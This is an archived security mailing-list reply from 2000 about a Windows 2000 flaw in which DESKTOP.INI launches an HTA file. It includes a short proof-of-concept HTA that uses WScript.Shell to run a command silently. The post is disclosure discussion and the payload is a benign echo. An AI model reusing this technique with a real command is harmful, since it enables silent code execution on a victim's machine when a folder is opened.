|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
Subject: Re: local Administrator compromise at least on default Windows 2000
From: Greg Anuzelli (greg
DIGITALINFO.NET)Date: Tue Aug 15 2000 - 16:37:20 CDT
- Next message: Shawn Wright: "Re: Process listening on TCP port 4198?"
- Previous message: Russ: "Re: Translate:f summary, history and thoughts"
- Maybe in reply to: Georgi Guninski: "local Administrator compromise at least on default Windows 2000"
- Maybe reply: Greg Anuzelli: "Re: local Administrator compromise at least on default Windows 2000"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Well, now that the cat's out of the bag I guess it's safe to discuss. :)
>Whether or not an .HTA could be invoked will, presumably, depend on what it
>attempts to do. Presumably its under the same constraints that FOLDER.HTT
is
>under, namely that the use of "unsafe" HTML code will cause it not to work.
>Assuming that Georgi's discovery about the OBJECT tag being able to invoke
>an application is a BUG, an .HTA that might do harm (that isn't using this
>OBJECT flaw) will cause a warning and not succeed.
The problem here is that an .HTA, by definition, does not operate in a
security sandbox. For all intents and purposes, they are applications like
.EXEs. So pointing to a FOLDER.HTA in DESKTOP.INI that contains this:
<html>
<body>
<script language="JavaScript">
obj = new ActiveXObject("WScript.Shell");
string="cmd /k echo Hi";
obj.Run(string,1);
</script>
</body>
</html>
Will pop up a command prompt just fine, no questions asked. The bug is that
desktop.ini should not launch .HTAs, due to their trusted nature.
----------------------------------------------------------------------------
Delivery co-sponsored by eEye Digital Security
============================================================================
Vulnerability Is Over ... eEye Digital Security Announces Retina(tm)
Retina, the unparalleled network security product that scans, monitors,
alerts, and automatically fixes network security vulnerabilities. Retina
includes an auto-update feature providing continuous update of its modules,
allowing users to keep pace with the latest security vulnerabilities.
Retina, the first network security software that works like an
around-the-clock human network security analyst. Available for download;
<http://www.eeye.com/click.asp?referrer=ntbugtraq1&P;=retina>
----------------------------------------------------------------------------
- Next message: Shawn Wright: "Re: Process listening on TCP port 4198?"
- Previous message: Russ: "Re: Translate:f summary, history and thoughts"
- Maybe in reply to: Georgi Guninski: "local Administrator compromise at least on default Windows 2000"
- Maybe reply: Greg Anuzelli: "Re: local Administrator compromise at least on default Windows 2000"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]